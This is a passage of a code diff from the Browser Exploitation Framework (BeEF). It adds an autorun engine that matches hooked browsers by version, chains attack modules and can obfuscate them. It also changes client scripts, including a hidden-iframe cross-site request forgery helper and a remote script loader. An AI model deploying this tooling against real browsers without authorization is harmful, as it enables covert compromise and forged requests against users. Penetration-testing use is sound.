+              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
+
+              # this is one of the wrappers in the middle of the chain
+              delayed_exec += %Q|
+                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
+                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
+                     #{code_snippet}
+                     #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
+                     function isResReady(mod_result, start){
+                        if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
+                           // loop
+                        }else{
+                           // module return status/data is now available
+                         clearInterval(resultReady);
+                          if (mod_result === null && #{@continue_after_timeout}){
+                              var mod_result = [];
+                              mod_result[0] = 1; //unknown status
+                              mod_result[1] = '' //empty result
+                          }
+                          var status = mod_result[0];
+                          if(#{conditions[i]}){
+                             #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
+                             #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
+              |
+
+              delayed_exec_footer = %Q|
+                         }
+                       }
+                     }
+                     var start = (new Date()).getTime();
+                     var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
+                  }
+                }
+                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
+              |
+
+              delayed_exec_footers.push(delayed_exec_footer)
+            else
+              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
+              # this is the last wrapper to prepare
+              delayed_exec += %Q|
+                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
+                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
+                     #{code_snippet}
+                     #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
+                  }
+                }
+                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
+              |
+            end
+            mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
+            wrapped_mod = "#{mod_body}\n"
+            wrapper += wrapped_mod
+            c += 1
+          end
+          wrapper += delayed_exec + delayed_exec_footers.reverse.join("\n")
+          print_more "Final Modules Wrapper:\n #{delayed_exec + delayed_exec_footers.reverse.join("\n")}" if @debug_on
+          wrapper
+        end
+
+
+        # prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it,
+        # and store it in the database.
+        # Returns the raw module body after template substitution.
+        def prepare_command(mod, options, hb_id, replace_input, rule_token)
+          config = BeEF::Core::Configuration.instance
+          begin
+            command = BeEF::Core::Models::Command.new(
+                :data => options.to_json,
+                :hooked_browser_id => hb_id,
+                :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"),
+                :creationdate => Time.new.to_i,
+                :instructions_sent => true
+            )
+            command.save
+
+            command_module = BeEF::Core::Models::CommandModule.first(:id => mod.id)
+            if (command_module.path.match(/^Dynamic/))
+              # metasploit and similar integrations
+              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
+            else
+              # normal modules always here
+              key = BeEF::Module.get_key_by_database_id(mod.id)
+              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
+            end
+
+            hb = BeEF::HBManager.get_by_id(hb_id)
+            hb_session = hb.session
+            command_module.command_id = command.id
+            command_module.session_id = hb_session
+            command_module.build_datastore(command.data)
+            command_module.pre_send
+
+            build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              command_body = evasion.obfuscate(command_module.output) + "\n\n"
+            else
+              command_body = command_module.output  + "\n\n"
+            end
+
+            # @note prints the event to the console
+            print_more "Preparing JS for command id [#{command.id}], module [#{mod.name}]"
+
+            replace_input ? mod_input = 'mod_input' : mod_input = ''
+            result = %Q|
+                var #{mod.name}_#{rule_token} = function(#{mod_input}){
+                    #{clean_command_body(command_body, replace_input)}
+                };
+                var #{mod.name}_#{rule_token}_can_exec = false;
+                var #{mod.name}_#{rule_token}_mod_output = null;
+            |
+
+            return {:mod_name => mod.name, :mod_body => result}
+          rescue =>  e
+            print_error e.message
+            print_debug e.backtrace.join("\n")
+          end
+        end
+
+        # Removes the beef.execute wrapper in order that modules are executed in the ARE wrapper, rather than
+        # using the default behavior of adding the module to an array and execute it at polling time.
+        #
+        # Also replace <<mod_input>> with mod_input variable if needed for chaining module output/input
+        def clean_command_body(command_body, replace_input)
+          begin
+            cmd_body = command_body.lines.map(&:chomp)
+            wrapper_start_index,wrapper_end_index = nil
+
+            cmd_body.each_with_index do |line, index|
+              if line.to_s =~ /^(beef|[a-zA-Z]+)\.execute\(function\(\)/
+                wrapper_start_index = index
+                break
+              end
+            end
+            if wrapper_start_index.nil?
+              print_error "[ARE] Could not find module start index"
+            end
+
+            cmd_body.reverse.each_with_index do |line, index|
+              if line.include?('});')
+                wrapper_end_index = index
+                break
+              end
+            end
+            if wrapper_end_index.nil?
+              print_error "[ARE] Could not find module end index"
+            end
+
+            cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index+1)).join("\n")
+            if cleaned_cmd_body.eql?('')
+              print_error "[ARE] No command to send"
+            end
+
+            # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
+            if replace_input
+              if cleaned_cmd_body.include?('"<<mod_input>>"')
+                final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"','mod_input')
+              elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
+                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
+              elsif cleaned_cmd_body.include?('<<mod_input>>')
+                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
+              else
+                return cleaned_cmd_body
+              end
+              return final_cmd_body
+            else
+              return cleaned_cmd_body
+            end
+          rescue =>  e
+            print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body"
+          end
+        end
+
+
+        # Checks if there are any ARE rules to be triggered for the specified hooked browser
+        #
+        # Note: browser version checks are supporting only major versions, ex: C 43, IE 11
+        # Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
+        #
+        # Returns an array with rule IDs that matched and should be triggered.
+        # if rule_id is specified, checks will be executed only against the specified rule (useful
+        #  for dynamic triggering of new rulesets ar runtime)
+        def match(browser, browser_version, os, os_version, rule_id=nil)
+          match_rules = []
+          if rule_id != nil
+            rules = [BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)]
+          else
+            rules = BeEF::Core::AutorunEngine::Models::Rule.all()
+          end
+          return nil if rules == nil
+          return nil unless rules.length > 0
+
+          print_info "[ARE] Checking if any defined rules should be triggered on target."
+          # TODO handle cases where there are multiple ARE rules for the same hooked browser.
+          # TODO the above works well, but maybe rules need to have priority or something?
+          rules.each do |rule|
+            begin
+              browser_match, os_match = false, false
+
+              b_ver_cond = rule.browser_version.split(' ').first
+              b_ver = rule.browser_version.split(' ').last
+
+              os_ver_rule_cond = rule.os_version.split(' ').first
+              os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
+              os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
+
+              # Most of the times Linux/*BSD OS doesn't return any version
+              # (TODO: improve OS detection on these operating systems)
+              if os_version != nil && !@VERSION_STR.include?(os_version)
+                os_ver_hook_maj = os_version.split('.').first
+                os_ver_hook_min = os_version.split('.').last
+
+                # the following assignments to 0 are need for later checks like:
+                # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
+                os_ver_hook_min = 0 if os_version.split('.').length == 1
+                os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
+              else
+                # most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
+                # to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
+                # we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
+                  os_ver_hook_maj, os_ver_hook_min = 5, 0 if os_version == 'XP'
+                  os_ver_hook_maj, os_ver_hook_min = 6, 0 if os_version == 'Vista'
+              end
+
+              os_ver_rule_maj, os_ver_rule_min = 5, 0 if os_ver_rule_maj == 'XP'
+              os_ver_rule_maj, os_ver_rule_min = 6, 0 if os_ver_rule_maj == 'Vista'
+
+              next unless @VERSION.include?(b_ver_cond)
+              next unless BeEF::Filters::is_valid_browserversion?(b_ver)
+
+              next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
+              # os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
+
+              # skip rule unless the browser matches
+              browser_match = false
+              # check if rule specifies multiple browsers
+              if rule.browser !~ /\A[A-Z]+\Z/
+                rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
+                  browser_match = true if b == browser || b == 'ALL'
+                end
+              # else, only one browser
+              else
+                next unless rule.browser == 'ALL' || browser == rule.browser
+                # check if the browser version matches
+                browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
+                if browser_version_match
+                  browser_match = true
+                else
+                  browser_match = false
+                end
+                print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
+              end
+              next unless browser_match
+
+              # skip rule unless the OS matches
+              next unless rule.os == 'ALL' || os == rule.os
+
+              # check if the OS versions match
+              if os_version != nil || rule.os_version != 'ALL'
+                os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
+                os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
+              else
+                # os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
+                os_major_version_match, os_minor_version_match = true, true
+              end
+
+              os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
+              print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
+
+              if browser_match && os_match
+                print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
+                match_rules.push(rule.id)
+              end
+            rescue =>  e
+              print_error e.message
+              print_debug e.backtrace.join("\n")
+            end
+          end
+          print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."
+
+          return match_rules
+        end
+
+        # compare versions
+        def compare_versions(ver_a, cond, ver_b)
+          return true if cond == 'ALL'
+          return true if cond == '==' && ver_a == ver_b
+          return true if cond == '<=' && ver_a <= ver_b
+          return true if cond == '<'  && ver_a <  ver_b
+          return true if cond == '>=' && ver_a >= ver_b
+          return true if cond == '>'  && ver_a >  ver_b
+          return false
+        end
+      end
+    end
+  end
+end

core/main/autorun_engine/models/execution.rb

@@ -0,0 +1,31 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module AutorunEngine
+      module Models
+        # @note Stored info about the execution of the ARE on hooked browsers.
+        class Execution
+
+          include DataMapper::Resource
+
+          storage_names[:default] = 'core_areexecution'
+
+          property :id, Serial
+          property :session, Text                         # hooked browser session where a ruleset triggered
+          property :mod_count, Integer                    # number of command modules of the ruleset
+          property :mod_successful, Integer               # number of command modules that returned with success
+          # By default Text is only 65K, so field length increased to 1 MB
+          property :mod_body, Text,    :length => 1024000 # entire command module(s) body to be sent
+          property :exec_time, String, :length => 15      # timestamp of ruleset triggering
+          property :rule_token, String, :length => 10     # unique token to be appended to wrapper function names
+          property :is_sent, Boolean
+        end
+      end
+    end
+  end
+end

core/main/autorun_engine/models/rule.rb

@@ -0,0 +1,34 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module AutorunEngine
+      module Models
+        # @note Table stores the rules for the Distributed Engine.
+        class Rule
+          include DataMapper::Resource
+
+          storage_names[:default] = 'core_arerules'
+
+          property :id, Serial
+          property :name, Text                                       # rule name
+          property :author, String                                   # rule author
+          property :browser, String, :length => 10                   # browser name
+          property :browser_version, String, :length => 15           # browser version
+          property :os, String, :length => 10                        # OS name
+          property :os_version, String, :length => 15                # OS version
+          property :modules, Text                                    # JSON stringyfied representation of the JSON rule for further parsing
+          property :execution_order, Text                            # command module execution order
+          property :execution_delay, Text                            # command module time delays
+          property :chain_mode, String, :length => 40                 # rule chaining mode
+
+          has n, :executions
+        end
+      end
+    end
+  end
+end

core/main/autorun_engine/parser.rb

@@ -0,0 +1,91 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module AutorunEngine
+
+      class Parser
+
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+        end
+
+        BROWSER = ['FF','C','IE','S','O','ALL']
+        OS = ['Linux','Windows','OSX','Android','iOS','BlackBerry','ALL']
+        VERSION = ['<','<=','==','>=','>','ALL','Vista','XP']
+        CHAIN_MODE = ['sequential','nested-forward']
+        MAX_VER_LEN = 15
+        # Parse a JSON ARE file and returns an Hash with the value mappings
+        def parse(name,author,browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
+          begin
+            success = [true]
+
+            return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
+            return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
+            return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
+            # if multiple browsers were specified, check each browser
+            if browser.kind_of?(Array)
+              browser.each do |b|
+                return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
+              end
+            # else, if only one browser was specified, check browser and browser version
+            else
+              return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
+              if browser_version != 'ALL'
+                return [false, 'Illegal browser_version definition'] unless
+                  VERSION.include?(browser_version[0,2].gsub(/\s+/,'')) &&
+                      BeEF::Filters::is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/,'')) && browser_version.length < MAX_VER_LEN
+              end
+            end
+
+            if os_version != 'ALL'
+              return [false, 'Illegal os_version definition'] unless
+                  VERSION.include?(os_version[0,2].gsub(/\s+/,'')) &&
+                      BeEF::Filters::is_valid_osversion?(os_version[2..-1].gsub(/\s+/,'')) && os_version.length < MAX_VER_LEN
+            end
+
+            return [false, 'Illegal os definition'] unless OS.include?(os)
+
+            # check if module names, conditions and options are ok
+            modules.each do |cmd_mod|
+              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
+              if mod != nil
+                modk = BeEF::Module.get_key_by_database_id(mod.id)
+                mod_options = BeEF::Module.get_options(modk)
+
+                opt_count = 0
+                mod_options.each do |opt|
+                   if opt['name'] == cmd_mod['options'].keys[opt_count]
+                     opt_count += 1
+                   else
+                     return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
+                                             }) for module (#{cmd_mod['name']}) does not exist"]
+                   end
+                end
+              else
+                return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
+              end
+            end
+
+            exec_order.each{ |order| return [false, 'execution_order values must be Integers'] unless order.integer?}
+            exec_delay.each{ |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer?}
+
+            return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
+                modules.size == exec_order.size && modules.size == exec_delay.size
+
+            success
+          rescue => e
+            print_error "#{e.message}"
+            print_debug "#{e.backtrace.join("\n")}"
+            return [false, 'Something went wrong.']
+          end
+        end
+      end
+    end
+  end
+end

core/main/autorun_engine/rule_loader.rb

@@ -0,0 +1,98 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module AutorunEngine
+
+      class RuleLoader
+
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+          @debug_on = @config.get('beef.debug')
+        end
+
+        # this expects parsed JSON as input
+        def load(data)
+          begin
+
+            name = data['name']
+            author = data['author']
+            browser = data['browser']||'ALL'
+            browser_version = data['browser_version']||'ALL'
+            os = data['os']||'ALL'
+            os_version = data['os_version']||'ALL'
+            modules = data['modules']
+            exec_order = data['execution_order']
+            exec_delay = data['execution_delay']
+            chain_mode = data['chain_mode']
+
+            parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
+                name,author,browser,browser_version,os,os_version,modules,exec_order,exec_delay,chain_mode)
+
+            if parser_result.length == 1 && parser_result.first
+              print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
+              if @debug_on
+                print_more "Target Browser: #{browser} (#{browser_version})"
+                print_more "Target OS: #{os} (#{os_version})"
+                print_more "Modules to Trigger:"
+                         modules.each do |mod|
+                            print_more "(*) Name: #{mod['name']}"
+                            print_more "(*) Condition: #{mod['condition']}"
+                            print_more "(*) Code: #{mod['code']}"
+                            print_more "(*) Options:"
+                            mod['options'].each do |key,value|
+                              print_more "\t#{key}: (#{value})"
+                            end
+                         end
+                print_more "Exec order: #{exec_order}"
+                print_more "Exec delay: #{exec_delay}"
+              end
+              are_rule = BeEF::Core::AutorunEngine::Models::Rule.new(
+                  :name => name,
+                  :author => author,
+                  :browser => browser,
+                  :browser_version => browser_version,
+                  :os => os,
+                  :os_version => os_version,
+                  :modules => modules.to_json,
+                  :execution_order => exec_order,
+                  :execution_delay => exec_delay,
+                  :chain_mode => chain_mode)
+              are_rule.save
+              return { 'success' => true, 'rule_id' => are_rule.id}
+            else
+              print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
+              return { 'success' => false, 'error' => parser_result.last }
+            end
+
+          rescue => e
+            err = 'Malformed JSON ruleset.'
+            print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
+            return { 'success' => false, 'error' => err }
+          end
+        end
+
+        def load_file(json_rule_path)
+          begin
+            rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
+            self.load JSON.parse(rule_file)
+          rescue => e
+            print_error "[ARE] Failed to load ruleset from #{json_rule_path}"
+          end
+        end
+
+        def load_directory
+          Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
+            print_debug "[ARE] Processing rule: #{rule}"
+            self.load_file rule
+          end
+        end
+      end
+    end
+  end
+end

core/main/client/are.js

@@ -1,47 +1,18 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 beef.are = {
-  init:function(){
-   var Jools = require('jools');
-   this.ruleEngine = new Jools();
+  status_success: function(){
+    return 1;
   },
-  send:function(module){
-    // there will probably be some other stuff here before things are finished
-    this.commands.push(module);
+  status_unknown: function(){
+    return 0;
   },
-  execute:function(inputs){
-    this.rulesEngine.execute(input);
-  },
-  cache_modules:function(modules){},
-  rules:[
-    {
-      'name':"exec_no_input",
-      'condition':function(command,browser){
-          //need to figure out how to handle the inputs
-          return (!command['inputs'] || command['inputs'].length == 0)
-       },
-      'consequence':function(command,browser){}
-    },
-    {
-      'name':"module_has_sibling",
-      'condition':function(command,commands){
-        return false;
-      },
-      'consequence':function(command,commands){}
-    },
-    {
-      'name':"module_depends_on_module",
-      'condition':function(command,commands){
-        return false;
-      },
-      'consequence':function(command,commands){}
-    }
-  ],
-  commands:[],
-  results:[]
+  status_error: function(){
+    return -1;
+  }
 };
 beef.regCmp("beef.are");

core/main/client/beef.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -12,66 +12,72 @@
 $j = jQuery.noConflict();
 
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
-	
-	var BeefJS = {
-		
-		version: '<%= @beef_version %>',
-		
-		// This get set to true during window.onload(). It's a useful hack when messing with document.write().
-		pageIsLoaded: false,
-		
-		// An array containing functions to be executed by the window.onpopstate() method.
-		onpopstate: new Array(),
-		
-		// An array containing functions to be executed by the window.onclose() method.
-		onclose: new Array(),
-		
-		// An array containing functions to be executed by Beef.
-		commands: new Array(),
-		
-		// An array containing all the BeEF JS components.
-		components: new Array(),
 
-                /**
-                 * Adds a function to display debug messages (wraps console.log())
-                 * @param: {string} the debug string to return
-                 */
-                debug: function(msg) {
-                    if (!<%= @client_debug %>) return;
-                    if (typeof console == "object" && typeof console.log == "function") {
-                        console.log(msg);
-                    } else {
-                        // TODO: maybe add a callback to BeEF server for debugging purposes
-                        //window.alert(msg);
-                    }
-                },
+    var BeefJS = {
 
-		/**
-		 * Adds a function to execute.
-		 * @param: {Function} the function to execute.
-		 */
-		execute: function(fn) {
-            if ( typeof  beef.websocket == "undefined"){
-                 this.commands.push(fn);
-            }else{
-                fn();
+        version: '<%= @beef_version %>',
+
+        // This get set to true during window.onload(). It's a useful hack when messing with document.write().
+        pageIsLoaded: false,
+
+        // An array containing functions to be executed by the window.onpopstate() method.
+        onpopstate: new Array(),
+
+        // An array containing functions to be executed by the window.onclose() method.
+        onclose: new Array(),
+
+        // An array containing functions to be executed by Beef.
+        commands: new Array(),
+
+        // An array containing all the BeEF JS components.
+        components: new Array(),
+
+        /**
+         * Adds a function to display debug messages (wraps console.log())
+         * @param: {string} the debug string to return
+         */
+        debug: function(msg) {
+            if (!<%= @client_debug %>) return;
+            if (typeof console == "object" && typeof console.log == "function") {
+                var currentdate = new Date();
+                var pad = function(n){return ("0" + n).slice(-2);}
+                var datetime = currentdate.getFullYear() + "-"
+                + pad(currentdate.getMonth()+1)  + "-"
+                + pad(currentdate.getDate()) + " "
+                + pad(currentdate.getHours()) + ":"
+                + pad(currentdate.getMinutes()) + ":"
+                + pad(currentdate.getSeconds());
+                console.log('['+datetime+'] '+msg);
+            } else {
+                // TODO: maybe add a callback to BeEF server for debugging purposes
+                //window.alert(msg);
             }
         },
 
+        /**
+        * Adds a function to execute.
+        * @param: {Function} the function to execute.
+        */
+        execute: function(fn) {
+                if ( typeof  beef.websocket == "undefined"){
+                    this.commands.push(fn);
+                }else{
+                    fn();
+                }
+        },
 
+       /**
+        * Registers a component in BeEF JS.
+        * @params: {String} the component.
+        *
+        * Components are very important to register so the framework does not
+        * send them back over and over again.
+        */
+        regCmp: function(component) {
+                this.components.push(component);
+        }
 
-		/**
-		 * Registers a component in BeEF JS.
-		 * @params: {String} the component.
-		 *
-		 * Components are very important to register so the framework does not
-		 * send them back over and over again.
-		 */
-		regCmp: function(component) {
-			this.components.push(component);
-		}
-	
     };
-	
-	window.beef = BeefJS;
+
+    window.beef = BeefJS;
 }

core/main/client/browser/cookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -71,12 +71,37 @@ beef.browser.cookie = {
 			( ( domain ) ? ";domain=" + domain : "" ) +
 			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
 		},
+
+	    /* Never stop the madness dear C. */
+		veganLol: function (){
+			var to_hell= '';
+			var min = 17;
+			var max = 25;
+			var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
+
+			var grunt = function(){
+				var moo = Math.floor(Math.random() * 62);
+				var char = '';
+				if(moo < 36){
+					char = String.fromCharCode(moo + 55);
+				}else{
+					char = String.fromCharCode(moo + 61);
+				}
+				if(char != ';' && char != '='){
+					return char;
+				}else{
+					return 'x';
+				}
+			};
+
+			while(to_hell.length < lol_length){
+				to_hell += grunt();
+			}
+			return to_hell;
+		},
 		
-		hasSessionCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', '', '/', '', '' );
+		hasSessionCookies: function (name){
+			this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
@@ -84,11 +109,8 @@ beef.browser.cookie = {
 			
 		},
 
-		hasPersistentCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', 1, '/', '', '' );
+		hasPersistentCookies: function (name){
+			this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');

core/main/client/browser/popup.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -16,7 +16,7 @@ beef.browser.popup = {
 	
 		blocker_enabled: function ()
 		{
-			screenParams = beef.browser.getScreenSize();
+			screenParams = beef.hardware.getScreenSize();
 			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
 			if (popUp == null || typeof(popUp)=='undefined') {   
 			  	return true;

core/main/client/dom.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -102,23 +102,19 @@ beef.dom = {
 	},
 	
 	/**
-     * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
-     * example usage in the code: beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+     * Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
+     * is assigned to created iframe tag's src attribute resulting in GET request to that URI.
+     * example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
 	 * @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
-	 * @param: {String} method: can be 'GET' or 'POST'. defaults to GET
 	 * @param: {Hash} params: list of params that will be sent in request.
 	 * @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
 	 * @param: {Function} a callback function to fire once the iFrame has loaded
 	 * @return: {Object} the inserted iFrame
+     *
 	 */
-	createIframe: function(type, method, params, styles, onload) {
+	createIframe: function(type, params, styles, onload) {
 		var css = {};
-		var form_submit = (method.toLowerCase() == 'post') ? true : false; 
-		if (form_submit && params['src'])
-		{
-			var form_action = params['src'];
-			params['src'] = '';
-		}
+
 		if (type == 'hidden') {
 			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
 		} else if (type == 'fullscreen') {
@@ -130,13 +126,6 @@ beef.dom = {
 		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
-		if (form_submit && form_action)
-		{
-			var id = beef.dom.generateID();
-			$j(iframe).attr({'id': id, 'name':id});
-			var form = beef.dom.createForm({'action':form_action, 'method':'get', 'target':id}, false);
-			$j(form).prependTo('body').submit();
-		}
 		return iframe;
 	},
 
@@ -151,7 +140,7 @@ beef.dom = {
             if ($j(this).attr('href') != '')
             {
                 e.preventDefault();
-                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
                 $j(document).attr('title', $j(this).html());
                 document.body.scroll = "no";
                 document.documentElement.style.overflow = 'hidden';
@@ -241,6 +230,13 @@ beef.dom = {
 		return form;
 	},
 	
+	loadScript: function(url) {
+	  var s = document.createElement('script');
+	  s.type = 'text/javascript';
+	  s.src = url;
+	  $j('body').append(s);
+	},
+
 	/**
 	 * Get the location of the current page.
 	 * @return: the location.
@@ -446,22 +442,30 @@ beef.dom = {
      * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
      * @params: {String} action: the form action attribute, where the request will be sent.
      * @params: {String} method: HTTP method, usually POST.
+     * @params: {String} enctype: form encoding type
      * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
      *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
      */
-    createIframeXsrfForm: function(action, method, inputs){
+    createIframeXsrfForm: function(action, method, enctype, inputs){
         var iframeXsrf = beef.dom.createInvisibleIframe();
 
         var formXsrf = document.createElement('form');
-        formXsrf.setAttribute('action', action);
-        formXsrf.setAttribute('method', method);
+        formXsrf.setAttribute('action',  action);
+        formXsrf.setAttribute('method',  method);
+        formXsrf.setAttribute('enctype', enctype);
 
         var input = null;
         for (i in inputs){
             var attributes = inputs[i];
             input = document.createElement('input');
                 for(key in attributes){
-                    input.setAttribute(key, attributes[key]);
+                    if (key == 'name' && attributes[key] == 'submit') {
+                      // workaround for https://github.com/beefproject/beef/issues/1117
+                      beef.debug("createIframeXsrfForm - warning: changed form input 'submit' to 'Submit'");
+                      input.setAttribute('Submit', attributes[key]);
+                    } else {
+                      input.setAttribute(key, attributes[key]);
+                    }
                 }
             formXsrf.appendChild(input);
         }

core/main/client/encode/base64.js
